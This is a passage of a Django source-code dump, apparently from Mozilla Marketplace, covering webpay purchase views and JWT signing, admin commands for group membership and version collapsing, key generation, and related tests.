    url(r'^webpay/inapp/prepare/', PreparePayInAppView.as_view(),
        name='webpay-prepare-inapp'),
    url(r'^webpay/failure/(?P<pk>\d+)/', FailureNotificationView.as_view(),
        name='webpay-failurenotification'),
    url(r'^webpay/sig_check/$', sig_check, name='webpay-sig_check')
)
########NEW FILE########
__FILENAME__ = utils
from django.conf import settings
import bleach
def strip_tags(text):
    """Return *text* coerced to unicode with every HTML tag removed.

    Until atob() supports encoded HTML we are stripping all tags.
    See bug 83152422.
    """
    cleaned = bleach.clean(unicode(text), tags=[], strip=True)
    return cleaned
def make_external_id(product):
    """
    Generates a webpay/solitude external ID given an addon's primary key.
    """
    # This namespace is currently necessary because app products
    # are mixed into an application's own in-app products.
    # Maybe we can fix that.
    # Also, we may use various dev/stage servers with the same
    # Bango test API.
    domain = getattr(settings, 'DOMAIN', None) or 'marketplace-dev'
    namespace = domain.split('.')[0]
    return '{0}:{1}'.format(namespace, product.pk)
########NEW FILE########
__FILENAME__ = views
import calendar
import time
import uuid
from django.conf import settings
from django.core.urlresolvers import reverse
from django.http import Http404
import commonware.log
from rest_framework import status
from rest_framework.decorators import api_view, permission_classes
from rest_framework.generics import GenericAPIView
from rest_framework.mixins import ListModelMixin, RetrieveModelMixin
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
from rest_framework.viewsets import GenericViewSet
import amo
from amo.helpers import absolutify, urlparams
from amo.utils import send_mail_jinja
from lib.cef_loggers import app_pay_cef
from mkt.api.authentication import (RestAnonymousAuthentication,
RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.authorization import (AllowOwner, AllowReadOnly, AnyOf,
GroupPermission)
from mkt.api.base import CORSMixin, MarketplaceView
from mkt.webpay.forms import FailureForm, PrepareInAppForm, PrepareWebAppForm
from mkt.webpay.models import ProductIcon
from mkt.webpay.serializers import ProductIconSerializer
from mkt.webpay.webpay_jwt import (get_product_jwt, InAppProduct,
sign_webpay_jwt, WebAppProduct)
from stats.models import Contribution
from . import tasks
log = commonware.log.getLogger('z.webpay')
class PreparePayWebAppView(CORSMixin, MarketplaceView, GenericAPIView):
    """POST endpoint that records a pending Contribution for an app
    purchase and returns a signed webpay JWT for navigator.pay()."""

    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication]
    permission_classes = [IsAuthenticated]
    cors_allowed_methods = ['post']

    def post(self, request, *args, **kwargs):
        form = PrepareWebAppForm(request.DATA)
        if not form.is_valid():
            return Response(form.errors, status=status.HTTP_400_BAD_REQUEST)

        app = form.cleaned_data['app']
        region = getattr(request, 'REGION', None)
        # Reject purchases from regions where this app has no price set.
        if region and region.id not in app.get_price_region_ids():
            log.info('Region {0} is not in {1}'
                     .format(region.id, app.get_price_region_ids()))
            return Response('Payments are limited and flag not enabled',
                            status=status.HTTP_403_FORBIDDEN)

        # A paid app can only be bought once per user.
        if app.is_premium() and app.has_purchased(request._request.amo_user):
            log.info('Already purchased: {0}'.format(app.pk))
            return Response({'reason': u'Already purchased app.'},
                            status=status.HTTP_409_CONFLICT)

        app_pay_cef.log(request._request, 'Preparing JWT', 'preparing_jwt',
                        'Preparing JWT for: {0}'.format(app.pk), severity=3)
        log.debug('Starting purchase of app: {0} by user: {1}'.format(
            app.pk, request._request.amo_user))

        # The contribution stays CONTRIB_PENDING until the payment
        # postback marks it complete.
        contribution = Contribution.objects.create(
            addon_id=app.pk,
            amount=app.get_price(region=request._request.REGION.id),
            paykey=None,
            price_tier=app.premium.price,
            source=request._request.REQUEST.get('src', ''),
            source_locale=request._request.LANG,
            type=amo.CONTRIB_PENDING,
            user=request._request.amo_user,
            uuid=str(uuid.uuid4()),
        )
        log.debug('Storing contrib for uuid: {0}'.format(contribution.uuid))

        token = get_product_jwt(WebAppProduct(app), contribution)
        return Response(token, status=status.HTTP_201_CREATED)
class PreparePayInAppView(CORSMixin, MarketplaceView, GenericAPIView):
    """POST endpoint that records a pending Contribution for an in-app
    purchase and returns a signed webpay JWT. Deliberately unauthenticated:
    in-app purchases come from arbitrary app content."""

    authentication_classes = []
    permission_classes = []
    cors_allowed_methods = ['post']

    def post(self, request, *args, **kwargs):
        form = PrepareInAppForm(request.DATA)
        if not form.is_valid():
            # CEF-log validation failures for security auditing.
            app_pay_cef.log(
                request._request,
                'Preparing InApp JWT Failed',
                'preparing_inapp_jwt_failed',
                'Preparing InApp JWT Failed error: {0}'.format(form.errors),
                severity=3
            )
            return Response(form.errors, status=status.HTTP_400_BAD_REQUEST)

        inapp = form.cleaned_data['inapp']
        app_pay_cef.log(
            request._request,
            'Preparing InApp JWT',
            'preparing_inapp_jwt',
            'Preparing InApp JWT for: {0}'.format(inapp.pk), severity=3
        )
        log.debug('Starting purchase of in app: {0}'.format(inapp.pk))

        contribution = Contribution.objects.create(
            addon_id=inapp.webapp.pk,
            # In-App payments are unauthenticated so we have no user
            # and therefore can't determine a meaningful region.
            amount=None,
            paykey=None,
            price_tier=inapp.price,
            source=request._request.REQUEST.get('src', ''),
            source_locale=request._request.LANG,
            type=amo.CONTRIB_PENDING,
            user=None,
            uuid=str(uuid.uuid4()),
        )
        log.debug('Storing contrib for uuid: {0}'.format(contribution.uuid))

        token = get_product_jwt(InAppProduct(inapp), contribution)
        return Response(token, status=status.HTTP_201_CREATED)
class StatusPayView(CORSMixin, MarketplaceView, GenericAPIView):
    """GET endpoint reporting whether a purchase contribution completed.

    Always answers 200 with 'complete' or 'incomplete'; lookup failures
    are folded into 'incomplete' so contribution uuids cannot be probed.
    """

    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication]
    permission_classes = [AllowOwner]
    cors_allowed_methods = ['get']
    queryset = Contribution.objects.filter(type=amo.CONTRIB_PURCHASE)
    lookup_field = 'uuid'

    def get_object(self):
        try:
            obj = super(StatusPayView, self).get_object()
        except Http404:
            # Anything that's not correct will be raised as a 404 so that it's
            # harder to iterate over contribution values.
            log.info('Contribution not found')
            return None

        if not obj.addon.has_purchased(self.request.amo_user):
            log.info('Not in AddonPurchase table')
            return None

        return obj

    def get(self, request, *args, **kwargs):
        self.object = self.get_object()
        data = {'status': 'complete' if self.object else 'incomplete'}
        return Response(data)
class FailureNotificationView(MarketplaceView, GenericAPIView):
    """PATCH endpoint, restricted to Transaction:NotifyFailure, that
    emails an app's authors when a payment postback keeps failing."""

    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication]
    permission_classes = [GroupPermission('Transaction', 'NotifyFailure')]
    # Contributions without a uuid cannot be looked up (404).
    queryset = Contribution.objects.filter(uuid__isnull=False)

    def patch(self, request, *args, **kwargs):
        form = FailureForm(request.DATA)
        if not form.is_valid():
            return Response(form.errors, status=status.HTTP_400_BAD_REQUEST)

        obj = self.get_object()
        # Template context for the failure notification email.
        data = {
            'transaction_id': obj,
            'transaction_url': absolutify(
                urlparams(reverse('mkt.developers.transactions'),
                          transaction_id=obj.uuid)),
            'url': form.cleaned_data['url'],
            'retries': form.cleaned_data['attempts']}
        owners = obj.addon.authors.values_list('email', flat=True)
        send_mail_jinja('Payment notification failure.',
                        'webpay/failure.txt',
                        data, recipient_list=owners)
        return Response(status=status.HTTP_202_ACCEPTED)
class ProductIconViewSet(CORSMixin, MarketplaceView, ListModelMixin,
                         RetrieveModelMixin, GenericViewSet):
    """Product icon API: anonymous read with field filtering; POST
    (ProductIcon:Create only) queues an async fetch/resize task and
    answers 202 Accepted."""

    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication,
                              RestAnonymousAuthentication]
    permission_classes = [AnyOf(AllowReadOnly,
                                GroupPermission('ProductIcon', 'Create'))]
    queryset = ProductIcon.objects.all()
    serializer_class = ProductIconSerializer
    cors_allowed_methods = ['get', 'post']
    filter_fields = ('ext_url', 'ext_size', 'size')

    def create(self, request, *args, **kwargs):
        serializer = self.get_serializer(data=request.DATA)
        if serializer.is_valid():
            # Pass the values as lazy logger args (instead of eager
            # %-interpolation) so the string is only built if this
            # record is actually emitted.
            log.info('Resizing product icon %s @ %s to %s for webpay',
                     serializer.data['ext_url'],
                     serializer.data['ext_size'],
                     serializer.data['size'])
            # The fetch/resize happens out-of-band in celery; hence 202.
            tasks.fetch_product_icon.delay(serializer.data['ext_url'],
                                           serializer.data['ext_size'],
                                           serializer.data['size'])
            return Response(serializer.data, status=status.HTTP_202_ACCEPTED)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['POST'])
@permission_classes((AllowAny,))
def sig_check(request):
    """
    Returns a signed JWT to use for signature checking.

    This is for Nagios checks to ensure that Marketplace's
    signed tokens are valid when processed by Webpay.
    """
    now = calendar.timegm(time.gmtime())
    claims = {
        'iss': settings.APP_PURCHASE_KEY,
        'typ': settings.SIG_CHECK_TYP,
        'aud': settings.APP_PURCHASE_AUD,
        'iat': now,
        'exp': now + 3600,  # expires in 1 hour
        'request': {},
    }
    return Response({'sig_check_jwt': sign_webpay_jwt(claims)}, status=201)
########NEW FILE########
__FILENAME__ = webpay_jwt
import calendar
import time
from urllib import urlencode
from django.conf import settings
from django.core.urlresolvers import reverse
import commonware.log
import amo
from amo.helpers import absolutify
from lib.crypto.webpay import sign_webpay_jwt
from mkt.webpay.utils import make_external_id, strip_tags
log = commonware.log.getLogger('z.purchase')
def get_product_jwt(product, contribution):
    """Prepare a JWT for paid products to pass into navigator.pay().

    :param product: a WebAppProduct or InAppProduct binding object.
    :param contribution: the pending Contribution for this purchase;
        its uuid is embedded in productData and in the status URL.
    :returns: dict with 'webpayJWT' (the signed token) and
        'contribStatusURL' (relative URL to poll purchase status).
    :raises ValueError: if the product has no cached solitude public_id.
    """
    issued_at = calendar.timegm(time.gmtime())

    product_data = product.product_data(contribution)
    if not product_data.get('public_id'):
        raise ValueError(
            'Cannot create JWT without a cached public_id for '
            'app {a}'.format(a=product.addon()))

    token_data = {
        'iss': settings.APP_PURCHASE_KEY,
        'typ': settings.APP_PURCHASE_TYP,
        'aud': settings.APP_PURCHASE_AUD,
        'iat': issued_at,
        'exp': issued_at + 3600,  # expires in 1 hour
        'request': {
            'id': product.external_id(),
            'name': unicode(product.name()),
            'icons': product.icons(),
            'description': strip_tags(product.description()),
            'pricePoint': product.price().name,
            'productData': urlencode(product_data),
            'chargebackURL': absolutify(reverse('webpay.chargeback')),
            'postbackURL': absolutify(reverse('webpay.postback')),
        }
    }

    token = sign_webpay_jwt(token_data)

    # Fixed leftover 'self.product' wording in the log message (this is
    # a module-level function, not a method).
    log.debug('Preparing webpay JWT for product {0}: {1}'.format(
        product.id(), token))

    return {
        'webpayJWT': token,
        'contribStatusURL': reverse(
            'webpay-status',
            kwargs={'uuid': contribution.uuid}
        )
    }
class WebAppProduct(object):
    """Binding layer to pass a web app into a JWT producer"""

    def __init__(self, webapp):
        self.webapp = webapp

    def id(self):
        return self.webapp.pk

    def external_id(self):
        return make_external_id(self.webapp)

    def name(self):
        return self.webapp.name

    def addon(self):
        return self.webapp

    def price(self):
        return self.webapp.premium.price

    def icons(self):
        # One entry per known icon size: string size -> absolute URL.
        get_url = self.webapp.get_icon_url
        return dict((str(size), absolutify(get_url(size)))
                    for size in amo.ADDON_ICON_SIZES)

    def description(self):
        return self.webapp.description

    def application_size(self):
        return self.webapp.current_version.all_files[0].size

    def product_data(self, contribution):
        return {
            'addon_id': self.webapp.pk,
            'application_size': self.application_size(),
            'contrib_uuid': contribution.uuid,
            'public_id': self.addon().solitude_public_id,
        }
class InAppProduct(object):
    """Binding layer to pass a in app object into a JWT producer"""

    def __init__(self, inapp):
        self.inapp = inapp

    def id(self):
        return self.inapp.pk

    def external_id(self):
        return 'inapp.{0}'.format(make_external_id(self.inapp))

    def name(self):
        return self.inapp.name

    def addon(self):
        return self.inapp.webapp

    def price(self):
        return self.inapp.price

    def icons(self):
        # TODO: Default to 64x64 icon until addressed in
        # https://bugzilla.mozilla.org/show_bug.cgi?id=981093
        logo = absolutify(self.inapp.logo_url)
        return {64: logo}

    def description(self):
        return self.inapp.webapp.description

    def application_size(self):
        # TODO: Should this be not none, and if so
        # How do we determine the size of an in app object?
        return None

    def product_data(self, contribution):
        data = {
            'addon_id': self.inapp.webapp.pk,
            'inapp_id': self.inapp.pk,
            'application_size': self.application_size(),
            'contrib_uuid': contribution.uuid,
            'public_id': self.addon().solitude_public_id,
        }
        return data
########NEW FILE########
__FILENAME__ = addusertogroup
from django.core.management.base import BaseCommand, CommandError
from django.db import IntegrityError
import commonware.log
from access.models import Group, GroupUser
from users.models import UserProfile
class Command(BaseCommand):
    """Management command wrapper around do_adduser()."""

    help = ('Add a new user to a group. Syntax: \n'
            '    ./manage.py addusertogroup <userid> <groupid>')
    log = commonware.log.getLogger('z.users')

    def handle(self, *args, **options):
        try:
            do_adduser(args[0], args[1])

            msg = 'Adding %s to %s\n' % (args[0], args[1])
            self.log.info(msg)
            self.stdout.write(msg)
        except IndexError:
            # Fewer than two positional args: show usage.
            raise CommandError(self.help)
def do_adduser(user, group):
    """Add a user (email or pk string) to a group (pk string).

    Raises CommandError on bad input, unknown user/group, or when the
    user is already a member (IntegrityError).
    """
    try:
        # 'user' may be an email address or a numeric pk.
        if '@' in user:
            user = UserProfile.objects.get(email=user)
        elif user.isdigit():
            user = UserProfile.objects.get(pk=user)
        else:
            raise CommandError('Unknown input for user.')

        if group.isdigit():
            group = Group.objects.get(pk=group)
        else:
            raise CommandError('Group must be a valid ID.')

        GroupUser.objects.create(user=user, group=group)

    except IntegrityError, e:
        # Unique constraint on (user, group): already a member.
        raise CommandError('User is already in that group? %s' % e)
    except UserProfile.DoesNotExist:
        raise CommandError('User (%s) does not exist.' % user)
    except Group.DoesNotExist:
        raise CommandError('Group (%s) does not exist.' % group)
########NEW FILE########
__FILENAME__ = collapse_versions
import json
from django.core.management.base import BaseCommand
from django.db import connection, transaction
import amo
from addons.models import Webapp
from files.models import File
from versions.models import Version
class Command(BaseCommand):
    """Management command wrapper around do_collapsing()."""

    help = 'Collapse versions for hosted apps'

    def handle(self, *args, **kwargs):
        do_collapsing()
def do_collapsing():
    """Collapse every hosted (non-packaged) app down to a single Version.

    For each app: pick the latest version, repoint activity logs at it,
    copy review metadata from the versions being removed, then delete the
    old versions and their file rows.  Raw SQL is used to sidestep model
    signals/caching; each app runs in its own transaction.
    """
    cursor = connection.cursor()
    # Key used inside serialized activity-log `arguments` entries.
    vkey = unicode(Version._meta)
    fkey = 'files'
    for app in (Webapp.objects.no_cache().filter(type=amo.ADDON_WEBAPP,
                                                 is_packaged=False)
                .exclude(status=amo.STATUS_DELETED)
                .no_transforms()):
        with transaction.commit_on_success():
            print 'Updating app [%s]' % app.id
            try:
                version = (Version.objects.filter(addon=app)
                           .no_transforms().latest())
            except Version.DoesNotExist:
                print 'App [%s] has no version? FIXME!' % app.id
                continue
            try:
                file_ = File.objects.filter(version=version).latest()
            except File.DoesNotExist:
                # NOTE(review): file_ stays None here; see the
                # file_.reviewed access near the end of this function.
                file_ = None
            old_versions = (app.versions.exclude(pk=version.id)
                            .no_transforms()
                            .order_by('-created'))
            if not old_versions:
                print 'No older versions found.'
                continue
            # Set the current_version to the one we're collapsing to. This
            # avoids integrity errors as we delete versions below.
            if app._current_version and app._current_version.id != version.id:
                cursor.execute('''
                    UPDATE addons SET current_version=%s
                    WHERE id=%s''', (version.id, app.id,))
                app._current_version = version
                print 'Set current_version for app [%s] to [%s]' % (
                    app.id, version.id)
            for old_version in old_versions:
                # Hosted app reviews' version column is always NULL.
                # `versioncomments` has no data for apps.
                # `applications_versions` has no data for apps.
                # VersionLogs and ActivityLogs
                cursor.execute('''
                    SELECT t1.id, t1.version_id, t2.id, t2.arguments, t2.details
                    FROM log_activity_version_mkt AS t1
                    JOIN log_activity_mkt AS t2
                    ON t1.activity_log_id=t2.id
                    WHERE t1.version_id=%s''', (old_version.id,))
                for row in cursor.fetchall():
                    (lav_id, lav_version_id,
                     la_id, la_arguments, la_details) = row
                    arguments = details = None
                    if la_arguments:
                        arguments = json.loads(la_arguments)
                    if la_details:
                        details = json.loads(la_details)
                    do_arguments_save = do_details_save = False
                    # arguments looks like:
                    # [{"webapps.webapp": 8}, {"versions.version": 8}]
                    # NOTE(review): if la_arguments is empty, `arguments`
                    # is still None here and this loop would raise
                    # TypeError -- presumably arguments is always set in
                    # practice; confirm against production data.
                    for _a in arguments:
                        if vkey in _a:
                            _a[vkey] = version.id
                            do_arguments_save = True
                    # details looks like:
                    # {"files": [35], "reviewtype": "pending", "comments": "yo"}
                    if file_ and details and fkey in details:
                        details[fkey] = [file_.id]
                        do_details_save = True
                    if do_arguments_save or do_details_save:
                        new_a = json.dumps(arguments) if arguments else ''
                        new_d = json.dumps(details) if details else ''
                        cursor.execute('''
                            UPDATE log_activity_mkt
                            SET arguments=%s, details=%s
                            WHERE id=%s''', (new_a, new_d, la_id))
                        if do_arguments_save:
                            print 'Activity log [%s] arguments updated: %s' % (
                                la_id, new_a)
                        if do_details_save:
                            print 'Activity log [%s] details updated: %s' % (
                                la_id, new_d)
                    cursor.execute('''
                        UPDATE log_activity_version_mkt
                        SET version_id=%s
                        WHERE id=%s''', (version.id, lav_id))
                    print 'Version log [%s] version id updated: %s => %s' % (
                        lav_id, old_version.id, version.id)
                # There are stale activity logs without the _mkt suffix that we
                # need to deal with to avoid integrity errors when we delete
                # the version.
                cursor.execute('''
                    SELECT activity_log_id FROM log_activity_version
                    WHERE version_id=%s''', (old_version.id,))
                for row in cursor.fetchall():
                    cursor.execute('''
                        DELETE FROM log_activity_app
                        WHERE activity_log_id=%s''', (row[0],))
                    cursor.execute('''
                        DELETE FROM log_activity_comment
                        WHERE activity_log_id=%s''', (row[0],))
                    cursor.execute('''
                        DELETE FROM log_activity_user
                        WHERE activity_log_id=%s''', (row[0],))
                    cursor.execute('''
                        DELETE FROM log_activity_version
                        WHERE activity_log_id=%s''', (row[0],))
                    cursor.execute(
                        'DELETE FROM log_activity WHERE id=%s', (row[0],))
                # Copy over important fields if not set on current version.
                if not version.releasenotes and old_version.releasenotes:
                    version.releasenotes = old_version.releasenotes
                    print 'Copied releasenotes (%s) from old_version [%s].' % (
                        version.releasenotes, old_version.id)
                if not version.approvalnotes and old_version.approvalnotes:
                    version.approvalnotes = old_version.approvalnotes
                    print 'Copied approvalnotes (%s) from old_version [%s].' % (
                        version.approvalnotes, old_version.id)
                if not version.reviewed and old_version.reviewed:
                    version.reviewed = old_version.reviewed
                    print 'Copied reviewed date (%s) from old version [%s].' % (
                        version.reviewed, old_version.id)
                if (not version.has_editor_comment and
                    old_version.has_editor_comment):
                    version.has_editor_comment = old_version.has_editor_comment
                    print 'Copied editor_comment flag from old version [%s].' % (
                        old_version.id,)
                if (not version.has_info_request and
                    old_version.has_info_request):
                    version.has_info_request = old_version.has_info_request
                    print 'Copied info_request flag from old version [%s].' % (
                        old_version.id,)
                # Always take the oldest created stamp since we want to keep
                # the first version's values.
                if old_version.created < version.created:
                    version.created = old_version.created
                # Delete this version's files and on-disk files.
                cursor.execute('''
                    DELETE FROM files
                    WHERE version_id=%s''', (old_version.id,))
                print 'Deleted files records attached to version [%s]' % (
                    old_version.id,)
                # NOTE(review): this ORM query runs after the raw DELETE
                # above -- presumably it still sees cached rows so the
                # on-disk paths can be reported; verify.
                old_files = File.objects.filter(version_id=old_version.id)
                for f in old_files:
                    print 'Please remove file from file system: %s' % f.file_path
                    File.objects.invalidate(f)
                # Delete the version itself.
                cursor.execute('''
                    DELETE FROM versions
                    WHERE id=%s''', (old_version.id,))
                Version.objects.invalidate(old_version)
                print 'Deleted version [%s]' % old_version.id
            # Save version to update any fields that were copied above.
            version.save()
            # Copy the file reviewed date if not set.
            # NOTE(review): file_ may be None here (File.DoesNotExist branch
            # above); a truthy version.reviewed would then raise
            # AttributeError on file_.reviewed -- confirm.
            if (version.reviewed and not file_.reviewed and
                file_.reviewed != version.reviewed):
                file_.update(reviewed=version.reviewed)
            # Call app.save to invalidate and re-index, etc.
            if file_:
                app.save()
########NEW FILE########
__FILENAME__ = genkey
import os
from optparse import make_option
from django.core.management.base import BaseCommand, CommandError
from lib.crypto import generate_key
class Command(BaseCommand):
help = 'Generate a randomized encryption encryption key'
option_list = BaseCommand.option_list + (
make_option('--dest', action='store',
help='Location for key file. Default: %default',
default='./encryption.key'),
make_option('--length', action='store', type=int,
help='Number of random bytes. Actual key length will be '
'double, i.e. 32 yields a 64 byte key. '
'Default: %default',
default=32),
)
def handle(self, *args, **options):
if os.path.exists(options['dest']):
raise CommandError('Key file already exists at %s; remove it '
'first or specify a new path with --dest'
% options['dest'])
with open(options['dest'], 'wb') as fp:
fp.write(generate_key(options['length']))
os.chmod(options['dest'], 0600)
print 'Wrote cryptography key: %s' % options['dest']
########NEW FILE########
__FILENAME__ = removeuserfromgroup
from django.core.management.base import BaseCommand, CommandError
from django.db import IntegrityError
import commonware.log
from access.models import Group, GroupUser
from users.models import UserProfile
class Command(BaseCommand):
    """Management command: remove a user from an access group.

    Thin CLI wrapper around :func:`do_removeuser`.
    """
    help = ('Remove a user from a group. Syntax: \n'
            '    ./manage.py removeuserfromgroup <userid> <groupid>')
    log = commonware.log.getLogger('z.users')

    def handle(self, *args, **options):
        try:
            user, group = args[0], args[1]
            do_removeuser(user, group)
            msg = 'Removing %s from %s\n' % (user, group)
            self.log.info(msg)
            self.stdout.write(msg)
        except IndexError:
            # Fewer than two positional arguments: show usage.
            raise CommandError(self.help)
def do_removeuser(user, group):
    """Drop *user*'s membership in *group*.

    *user* may be an email or a numeric pk string; *group* must be a
    numeric pk string.  Removing a non-member is a silent no-op.
    """
    try:
        if '@' in user:
            profile = UserProfile.objects.get(email=user)
        elif user.isdigit():
            profile = UserProfile.objects.get(pk=user)
        else:
            raise CommandError('Unknown input for user.')

        if not group.isdigit():
            raise CommandError('Group must be a valid ID.')
        group_obj = Group.objects.get(pk=group)

        # Doesn't actually check if the user was in the group or not.
        GroupUser.objects.filter(user=profile, group=group_obj).delete()
    except UserProfile.DoesNotExist:
        raise CommandError('User (%s) does not exist.' % user)
    except Group.DoesNotExist:
        raise CommandError('Group (%s) does not exist.' % group)
########NEW FILE########
__FILENAME__ = models
########NEW FILE########
__FILENAME__ = test_commands
from nose.exc import SkipTest
import amo.tests
from apps.access.acl import action_allowed_user
from apps.users.models import UserProfile
from mkt.site.fixtures import fixture
from mkt.zadmin.management.commands.addusertogroup import do_adduser
from mkt.zadmin.management.commands.removeuserfromgroup import do_removeuser
class TestCommand(amo.tests.TestCase):
    """Round-trip test for the add/remove group management helpers."""
    fixtures = fixture('group_admin', 'user_10482')

    def test_group_management(self):
        # TODO. I don't know how to override caching in tests --clouserw
        raise SkipTest('Fails due to caching of groups.all()')
        profile = UserProfile.objects.get(pk=10482)
        assert not action_allowed_user(profile, 'Admin', '%')
        do_adduser('10482', '1')
        assert action_allowed_user(profile, 'Admin', '%')
        do_removeuser('10482', '1')
        assert not action_allowed_user(profile, 'Admin', '%')
########NEW FILE########
__FILENAME__ = test_views
from django.conf import settings
from django.core.urlresolvers import reverse
from nose.tools import eq_
from pyquery import PyQuery as pq
import amo
import amo.tests
from editors.models import RereviewQueue
from mkt.site.fixtures import fixture
from users.models import UserProfile
class TestHome(amo.tests.TestCase):
    """Smoke test: the AMO admin home must still render on Marketplace."""
    fixtures = ['base/users']

    def setUp(self):
        self.client.login(username='[email protected]', password='password')

    def test_home(self):
        # Loading the admin landing page should not raise.
        response = self.client.get(reverse('zadmin.index'))
        eq_(response.status_code, 200)
class TestGenerateError(amo.tests.TestCase):
    """Exercise the zadmin error-generation view against an in-memory
    heka client: one test per supported error type."""
    fixtures = ['base/users']

    def setUp(self):
        self.client.login(username='[email protected]', password='password')
        heka = settings.HEKA
        # Capture messages in a DebugCaptureStream instead of shipping
        # them anywhere; NullEncoder keeps them as message objects.
        HEKA_CONF = {
            'logger': 'zamboni',
            'plugins': {'cef': ('heka_cef.cef_plugin:config_plugin',
                                {'override': True})},
            'stream': {'class': 'heka.streams.DebugCaptureStream'},
            'encoder': 'heka.encoders.NullEncoder',
        }
        from heka.config import client_from_dict_config
        self.heka = client_from_dict_config(HEKA_CONF, heka)
        self.heka.stream.msgs.clear()

    def test_heka_statsd(self):
        self.url = reverse('zadmin.generate-error')
        self.client.post(self.url,
                         {'error': 'heka_statsd'})
        # Exactly one counter message should have been captured.
        eq_(len(self.heka.stream.msgs), 1)
        msg = self.heka.stream.msgs[0]
        eq_(msg.severity, 6)
        eq_(msg.logger, 'zamboni')
        eq_(msg.payload, '1')
        eq_(msg.type, 'counter')
        rate = [f for f in msg.fields if f.name == 'rate'][0]
        name = [f for f in msg.fields if f.name == 'name'][0]
        eq_(rate.value_double, [1.0])
        eq_(name.value_string, ['z.zadmin'])

    def test_heka_json(self):
        self.url = reverse('zadmin.generate-error')
        self.client.post(self.url,
                         {'error': 'heka_json'})
        eq_(len(self.heka.stream.msgs), 1)
        msg = self.heka.stream.msgs[0]
        eq_(msg.type, 'heka_json')
        eq_(msg.logger, 'zamboni')
        foo = [f for f in msg.fields if f.name == 'foo'][0]
        secret = [f for f in msg.fields if f.name == 'secret'][0]
        eq_(foo.value_string, ['bar'])
        eq_(secret.value_integer, [42])

    def test_heka_cef(self):
        self.url = reverse('zadmin.generate-error')
        self.client.post(self.url,
                         {'error': 'heka_cef'})
        eq_(len(self.heka.stream.msgs), 1)
        msg = self.heka.stream.msgs[0]
        eq_(msg.type, 'cef')
        eq_(msg.logger, 'zamboni')

    def test_heka_sentry(self):
        self.url = reverse('zadmin.generate-error')
        self.client.post(self.url,
                         {'error': 'heka_sentry'})
        msgs = self.heka.stream.msgs
        eq_(len(msgs), 1)
        msg = msgs[0]
        eq_(msg.type, 'sentry')
class TestAddonAdmin(amo.tests.TestCase):
    """Check the Django-admin addon changelist as an admin user."""
    fixtures = ['base/users', 'base/337141-steamcube', 'base/addon_3615']

    def setUp(self):
        self.login('[email protected]')
        self.url = reverse('admin:addons_addon_changelist')

    def test_no_webapps(self):
        response = self.client.get(self.url, follow=True)
        eq_(response.status_code, 200)
        doc = pq(response.content)
        # Exactly one row, linking to the expected addon change page.
        rows = doc('#result_list tbody tr')
        eq_(rows.length, 1)
        eq_(rows.find('a').attr('href'), '/admin/models/addons/addon/337141/')
class TestManifestRevalidation(amo.tests.TestCase):
    """Access control and behaviour of the manifest revalidation trigger."""
    fixtures = fixture('webapp_337141') + ['base/users']

    def setUp(self):
        self.url = reverse('zadmin.manifest_revalidation')

    def _test_revalidation(self):
        # Shared body: a POST should report success and queue exactly one
        # new re-review entry.
        current_count = RereviewQueue.objects.count()
        response = self.client.post(self.url)
        eq_(response.status_code, 200)
        self.assertTrue('Manifest revalidation queued' in response.content)
        eq_(len(RereviewQueue.objects.all()), current_count + 1)

    def test_revalidation_by_reviewers(self):
        # Sr Reviewers users should be able to use the feature.
        user = UserProfile.objects.get(email='[email protected]')
        self.grant_permission(user, 'ReviewerAdminTools:View')
        assert self.client.login(username='[email protected]',
                                 password='password')
        self._test_revalidation()

    def test_revalidation_by_admin(self):
        # Admin users should be able to use the feature.
        assert self.client.login(username='[email protected]',
                                 password='password')
        self._test_revalidation()

    def test_unpriviliged_user(self):
        # Unprivileged user should not be able to reach the feature.
        assert self.client.login(username='[email protected]',
                                 password='password')
        eq_(self.client.post(self.url).status_code, 403)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import patterns, url
from . import views
# Admin-only URLs; the names are referenced via reverse('zadmin.*') from
# views and tests.
urlpatterns = patterns(
    '',
    url('^elastic$', views.elastic, name='zadmin.elastic'),
    url('^manifest-revalidation$', views.manifest_revalidation,
        name='zadmin.manifest_revalidation'),
)
########NEW FILE########
__FILENAME__ = views
from django.conf import settings
from django.db.models import Q
from django.shortcuts import render
import elasticutils
import amo
from amo.utils import chunked
from zadmin.decorators import admin_required
from mkt.webapps.models import Webapp
from mkt.webapps.tasks import update_manifests
@admin_required(reviewers=True)
def manifest_revalidation(request):
    """Queue a manifest re-fetch for every public, hosted, enabled app."""
    if request.method == 'POST':
        # Only hosted (non-packaged), public, user-enabled apps qualify.
        criteria = Q(is_packaged=False, status=amo.STATUS_PUBLIC,
                     disabled_by_user=False)
        pks = Webapp.objects.filter(criteria).values_list('pk', flat=True)
        # Fan out in batches so no single task payload gets too large.
        for batch in chunked(pks, 100):
            update_manifests.delay(list(batch), check_hash=False)
        amo.messages.success(request, 'Manifest revalidation queued')
    return render(request, 'zadmin/manifest.html')
@admin_required
def elastic(request):
    """Render a debugging page with Elasticsearch cluster diagnostics."""
    es = elasticutils.get_es()
    indexes = set(settings.ES_INDEXES.values())
    mappings = es.get_mapping(None, indexes)
    context = {
        'aliases': es.aliases(),
        'health': es.health(),
        'state': es.cluster_state(),
        # Missing indexes render as an empty mapping rather than erroring.
        'mappings': [(index, mappings.get(index, {})) for index in indexes],
    }
    return render(request, 'zadmin/elastic.html', context)
########NEW FILE########
__FILENAME__ = auth_google_analytics
#!/usr/bin/python
"""
This script is for setting up OAuth credentials for Google Analytics.
To use:
Visit https://code.google.com/apis/console/ and select "API Access".
If a client ID for an "installed application" hasn't been created, add one.
Click "Download JSON" in the box containing information about that client ID.
Run this script: 'python auth_google_analytics.py --secrets client_secrets.json'
(If you are running this on a host with no web browser, pass
--noauth_local_webserver as well.)
Paste the printed credentials into the Django settings file.
"""
import json
import pprint
import sys
import gflags
from oauth2client.client import flow_from_clientsecrets, Storage, EXPIRY_FORMAT
from oauth2client.tools import run
gflags.DEFINE_string('secrets', None, 'Client secret JSON filename', short_name='f')
gflags.FLAGS(sys.argv)

CLIENT_SECRETS = gflags.FLAGS.secrets
MISSING_CLIENT_SECRETS_MESSAGE = ("%s is missing or doesn't contain secrets "
                                  "for a web application" % CLIENT_SECRETS)

